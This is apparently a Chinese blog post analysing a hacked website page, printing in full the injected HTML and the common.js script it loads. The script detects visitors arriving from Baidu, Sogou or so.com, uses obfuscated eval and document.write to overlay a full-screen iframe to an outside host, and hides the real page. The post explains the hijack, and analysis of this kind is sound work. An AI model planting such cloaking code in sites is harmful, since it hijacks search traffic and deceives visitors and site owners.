网站页面挂恶意代码分析

不少企业或个人网站被人恶意挂了违规内容,劫持搜索流量,影响网站正常收录,同时可能涉及违法违规。
 
这类情况,直接访问会发现网站能正常访问浏览,但从指定搜索网站进去就加载了嵌入页面。
 
今天刚好看到这样一个页面,代码如下:

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>document.title='XXXXXX有限公司';</script>
<title>&#27979;&#35797;&#20195;&#30721;&#45;&#99;&#104;&#105;&#110;&#97;&#101;&#46;&#111;&#114;&#103;&#45;&#31449;&#38271;&#32852;&#30431;</title>
<meta name="keywords" content="&#27979;&#35797;&#20195;&#30721;&#45;&#99;&#104;&#105;&#110;&#97;&#101;&#46;&#111;&#114;&#103;&#45;&#31449;&#38271;&#32852;&#30431;" />
<meta name="description" content="&#27979;&#35797;&#20195;&#30721;&#45;&#99;&#104;&#105;&#110;&#97;&#101;&#46;&#111;&#114;&#103;&#45;&#31449;&#38271;&#32852;&#30431;" />
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
</head>
<script language="javascript" type="text/javascript" src="/common.js"></script>
测试页面
</body>
</html>


其中common.js代码如下:

var titlestr = document.title;
var arr = ["http://www.xxxx.com:21008"];
var referer = document.referrer;
var regex=/(baidu.com|sogou.com|so.com)/i;
if(regex.test(referer))
{
  setFrame(arr[Math.floor(Math.random() * arr.length)]);
}
function setFrame(olink) {
  var ss = '<title>' + titlestr + '</title><div id="showcloneshengxiaon" style="height: 100%; width: 100%; background-color: rgb(255, 255, 255); background-position: initial initial; background-repeat: initial initial;"><ifr' + 'ame scrolling="yes" marginheight=0 marginwidth=0 frameborder="0" width="100%" height="100%" src="' + olink + '"></iframe></div><style type="text/css">html{width:100%;height:100%;}body {width:100%;height:100%;}</style>';
  eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');");
  try {
    setTimeout(function() {
      console.log(document.body.children.length);
      for (var i = 0; i < document.body.children.length; i++) {
        try {
          var a = document.body.children[i].tagName;
          var b = document.body.children[i].id;
          console.log(i + "***" + a + "**" + b);
          if (b != "iconDiv1" && b != "showcloneshengxiaon" && a != "title") {
            document.body.children[i].style.display = "non" + "e"
          }
        } catch(e) {}
      }
      var oMeta = document.createElement('meta');
      oMeta.name = 'viewport';
      oMeta.content = 'width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no';
      document.getElementsByTagName('head')[0].appendChild(oMeta);
    },
    100)
  } catch(e) {}
}